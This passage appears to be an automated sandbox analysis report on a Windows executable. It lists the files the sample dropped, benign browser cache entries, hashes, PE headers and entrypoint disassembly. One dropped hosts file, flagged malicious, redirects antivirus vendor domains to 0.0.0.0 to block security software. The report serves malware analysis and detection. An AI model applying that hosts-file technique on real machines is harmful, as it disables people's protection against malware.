                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):55
                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                            C:\Windows\System32\drivers\etc\hosts

                                                                                                                                            Download File
                                                                                                                                            Process:C:\ProgramData\GDBFCGIIIJ.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2748
                                                                                                                                            Entropy (8bit):4.269302338623222
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                                                                                                                            MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                                                                                                                            SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                                                                                                                            SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                                                                                                                            SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..

                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1835008
                                                                                                                                            Entropy (8bit):4.465456253520661
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:TIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNIdwBCswSbt:EXD94+WlLZMM6YFHG+t
                                                                                                                                            MD5:AC5F757D5670A3A446A57A05D3A6E8DA
                                                                                                                                            SHA1:DC89A141409C09BA86C40E7FB13D060C63D1966D
                                                                                                                                            SHA-256:541D178B202EA1A654E938149788972C99E6B911DCE26ABD7218C788852634FC
                                                                                                                                            SHA-512:3D401FD226C89AE30F8B0929B65542900F19930310CE9B6AEBAE68025018F9186D9F6A2BE613D4E9E7FEABF8ACFC7B56FEC3B6B5E74C2C0910F3CF2D63F48D3A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm2..+..............................................................................................................................................................................................................................................................................................................................................;j..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            Chrome Cache Entry: 100

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1302)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):117949
                                                                                                                                            Entropy (8bit):5.4843553913091005
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:D7yvvjOy7sipKTr3dH39oogNLLDzZzS7oF:D7yjOy7LS39mnhS7oF
                                                                                                                                            MD5:A5D33473ED0997C008D1C053E0773EBE
                                                                                                                                            SHA1:FEB4CB89145601A0141CC5869BEDF9AE7CD5CB80
                                                                                                                                            SHA-256:14C27BB0224FCF89A43B444B427DABE3D0AF184CAA7B6B4990CE228C51AE01C1
                                                                                                                                            SHA-512:3C0A48F9FA05469F950D9A268F1B3E9285A783A555EE597A2E203B688EB0FBCAEA3F4DE9BC8F5381C661007D0C6C4AFA70C19B7826D69A0E2A914A55973D14BD
                                                                                                                                            Malicious:false
                                                                                                                                            URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0"
                                                                                                                                            Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);.var da,ea,ha,na,oa,sa,ta,wa;da=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);na=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

                                                                                                                                            Chrome Cache Entry: 101

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1660
                                                                                                                                            Entropy (8bit):4.301517070642596
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                            MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                            SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                            SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                            SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                            Chrome Cache Entry: 95

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):5162
                                                                                                                                            Entropy (8bit):5.3503139230837595
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                            MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                            SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                            SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                            SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                            Malicious:false
                                                                                                                                            URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.GZmhE2vV14w.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTuKvZ-nsYNivRzfGpm8QSi6tMFrvg"
                                                                                                                                            Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                            Chrome Cache Entry: 96

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (2287)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):178061
                                                                                                                                            Entropy (8bit):5.555305495625512
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:i7bpK2pOwPnpW+DsZDbnjuBv5Vjq3B30GSK20YOA2ZPnpm6UzDnI13o2Mn5Pz5R3:i7bzO6I+DsZDDjuBv5Vjq3B30GSXOA24
                                                                                                                                            MD5:2901E98725751AAF9E3A6DA8A0AE100F
                                                                                                                                            SHA1:9A03B9B58521464BEA5EFDB95898D7A4DE2D66C6
                                                                                                                                            SHA-256:783C8FCA9918286C64FDD9C6DF8BB841815E5F6BA7BA95424DF63EA1ACF01B2D
                                                                                                                                            SHA-512:21235956E9B45B0C78055C8862072DE63FB1971F6396945610AC925A3E9D2D9FFAEC996DF4A64B33BC57B0EF6CF185A68DAC17D9AD5E570277CDD2BB869C9EBD
                                                                                                                                            Malicious:false
                                                                                                                                            URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.mTUNAFoITms.2019.O/rt=j/m=q_d,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu-nsZOrMYTmX5E4o0SDpwg5MUFYA"
                                                                                                                                            Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.kj=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var lj,mj,oj,rj,uj,tj,nj,sj;lj=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};mj=function(){_.Ka()};oj=function(){nj===void 0&&(nj=typeof WeakMap==="function"?lj(WeakMap):null);return nj};rj=function(a,b){(_.pj||(_.pj=new nj)).set(a,b);(_.qj||(_.qj=new nj)).set(b,a)};.uj=function(a){if(sj===void 0){const b=new tj([],{});sj=Array.prototype.concat.call([],b).length===1}sj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.vj=function(a,b,c,d){a=_.zb(a,b,c,d);return Array.isArray(a)?a:_.Qc};_.wj=function(a,b){a=(2&b?a|2:a&-3)|32;return a&=-2049};_.xj=function(a,b){a===0&&(a=_.wj(a,b));return a|1};_.yj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.zj=function(a,b,c){32&b&&c||(a&=-33);return a};._.Dj=function(a,b,c,d,e,f,g){const h=a.ea;var k=!!(2&b);e=k?

                                                                                                                                            Chrome Cache Entry: 97

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (790)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):795
                                                                                                                                            Entropy (8bit):5.154869279932952
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:TDtF6peNdBHslgT9lCuABuoB7HHHHHHHYqmffffffo:TDtFLKlgZ01BuSEqmffffffo
                                                                                                                                            MD5:7820EBA9A604ECC7BD8546644FAAD471
                                                                                                                                            SHA1:C3A71D0FD184D39357CEBF8F0610FE5B71C04F0D
                                                                                                                                            SHA-256:97C59311017E8E1BEB9049D6B45B5EF7238897FEA09E6FDD4B7255705FAF5FDA
                                                                                                                                            SHA-512:A795497A2EDC5D48C51E2B314372ADD4EF7CB1C945D6AFD685202FDD2664F8AC63B3FB32BE22DE783A1F0CB7AA56EC91A49D67D0FF450C0022D50A6C0BAECBEC
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                            Preview:)]}'.["",["dodgers yankees world series baseball","chromakopia sales","hurricanes tropical storms","powerball jackpot","ipl 2025 auction","mystery manor monopoly go rewards","demi moore the substance streaming","dill pickle sandwich jimmy johns"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                            Chrome Cache Entry: 98

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):29
                                                                                                                                            Entropy (8bit):3.9353986674667634
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                            MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                            SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                            SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                            SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://www.google.com/async/newtab_promos
                                                                                                                                            Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                            Chrome Cache Entry: 99

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65531)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):133746
                                                                                                                                            Entropy (8bit):5.43671304918829
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:2PLvjxd0QniyZ+qQf4VBNQ0pqGvx7U+OUaKszQ:ELvv0yTVBNQ0pBvxI+ORQ
                                                                                                                                            MD5:8AF8C8B6BDB861F6BB56EEFEB87AB01B
                                                                                                                                            SHA1:B45B8F53012D6F5E6A784C3FD19532007CA6AC7C
                                                                                                                                            SHA-256:04738B6136EB3F137A8CD298CDF33D3954338E703A1F329D098D91ABB231A071
                                                                                                                                            SHA-512:D86D395724A01EBED5F7499DA451C5CBB05D687DC9C571C437AF192D9E7D5C54F0E8DF9204A3B7405C3E6ACEEB9C613740F3A0F4DDBBF78CDABA89D5A4B1BB7E
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                            Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_1d gb_Pe gb_pd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Od\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_jd gb_nd gb_Ed gb_kd\"\u003e\u003cdiv class\u003d\"gb_vd gb_qd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):7.261810188775787
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.55%
                                                                                                                                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:WGo3ga1AL9.exe
                                                                                                                                            File size:721'408 bytes
                                                                                                                                            MD5:61b72b2d4099b7ca2af5318b4ea6a668
                                                                                                                                            SHA1:7c38e00060124176ae1b5ad7f17dd8a202445f26
                                                                                                                                            SHA256:b3b766fc82f285fbdfdfd1246fa7a227e7e8d4228a0a13c6187c4aab2149d0be
                                                                                                                                            SHA512:b764e2204f473c7d09186a1dd8f4111344066a5219c76fe08076c46053d2ff620c43257f09e249931b684f1c055be2db3cffac1d4543c062ca7f956aca7f8106
                                                                                                                                            SSDEEP:12288:q3IbtEqk/k9aqG1G7uSuYC7QQhguHuM+hECDgLEoX5+rUKHRmc65L2Vl2:q3C+BMQqGESMAh/OMknD4jcrJHRmbOl
                                                                                                                                            TLSH:1FE4F1232591FC71D51506B28D2FC6F8367EB8B16E5EEE6B32186F4F14711A29263313
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C..^.q...q...q...#?..q...#...q...#8..q.. ....q...q..~q...#1..q...#/..q...#*..q..Rich.q..........................PE..L......e...

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:63796de971636e0f

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x40510f
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x65BF94D7 [Sun Feb 4 13:44:55 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:5
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:5
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:5
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:fe68515784559bdc15451f33c744290f

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            call 00007F0F50B6021Bh
                                                                                                                                            jmp 00007F0F50B5D20Eh
                                                                                                                                            mov edi, edi
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            push edi
                                                                                                                                            mov edi, 000003E8h
                                                                                                                                            push edi
                                                                                                                                            call dword ptr [004010B4h]
                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                            call dword ptr [004010B0h]
                                                                                                                                            add edi, 000003E8h
                                                                                                                                            cmp edi, 0000EA60h
                                                                                                                                            jnbe 00007F0F50B5D396h
                                                                                                                                            test eax, eax
                                                                                                                                            je 00007F0F50B5D370h
                                                                                                                                            pop edi
                                                                                                                                            pop ebp
                                                                                                                                            ret
                                                                                                                                            mov edi, edi
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            call 00007F0F50B5DAD9h
                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                            call 00007F0F50B5D926h
                                                                                                                                            push dword ptr [0049501Ch]
                                                                                                                                            call 00007F0F50B5FC77h
                                                                                                                                            push 000000FFh
                                                                                                                                            call eax
                                                                                                                                            add esp, 0Ch
                                                                                                                                            pop ebp
                                                                                                                                            ret
                                                                                                                                            mov edi, edi
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            push 0040120Ch
                                                                                                                                            call dword ptr [004010B0h]
                                                                                                                                            test eax, eax
                                                                                                                                            je 00007F0F50B5D3A7h
                                                                                                                                            push 004011FCh
                                                                                                                                            push eax
                                                                                                                                            call dword ptr [00401078h]
                                                                                                                                            test eax, eax
                                                                                                                                            je 00007F0F50B5D397h
                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                            call eax
                                                                                                                                            pop ebp
                                                                                                                                            ret
                                                                                                                                            mov edi, edi
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                            call 00007F0F50B5D35Dh
                                                                                                                                            pop ecx
                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                            call dword ptr [004010B8h]
                                                                                                                                            int3
                                                                                                                                            push 00000008h
                                                                                                                                            call 00007F0F50B60385h
                                                                                                                                            pop ecx
                                                                                                                                            ret
                                                                                                                                            push 00000008h
                                                                                                                                            call 00007F0F50B602A2h
                                                                                                                                            pop ecx
                                                                                                                                            ret
                                                                                                                                            mov edi, edi
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            push esi
                                                                                                                                            mov esi, eax
                                                                                                                                            jmp 00007F0F50B5D39Dh
                                                                                                                                            mov eax, dword ptr [esi]
                                                                                                                                            test eax, eax
                                                                                                                                            je 00007F0F50B5D394h

                                                                                                                                            Rich Headers

                                                                                                                                            Programming Language:
                                                                                                                                            • [C++] VS2008 build 21022
                                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                                            • [LNK] VS2008 build 21022

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x93e640x28.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x14338.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2eb0000xb98.reloc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3f480x40.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x190.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x10000x937660x93800b657a345f61d0c89a1655d12967f2ffaFalse0.8645756091101695data7.621591774129554IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .data0x950000xace40x620064bc135de3aec5e48c40aebbec20f818False0.08597735969387756data1.011308233722332IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .noramix0xa00000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .rusovox0xa10000xd60x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .rsrc0xa20000x2483380x1440041fb2c9cf13e55ca3a3de6f8c73e8efcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
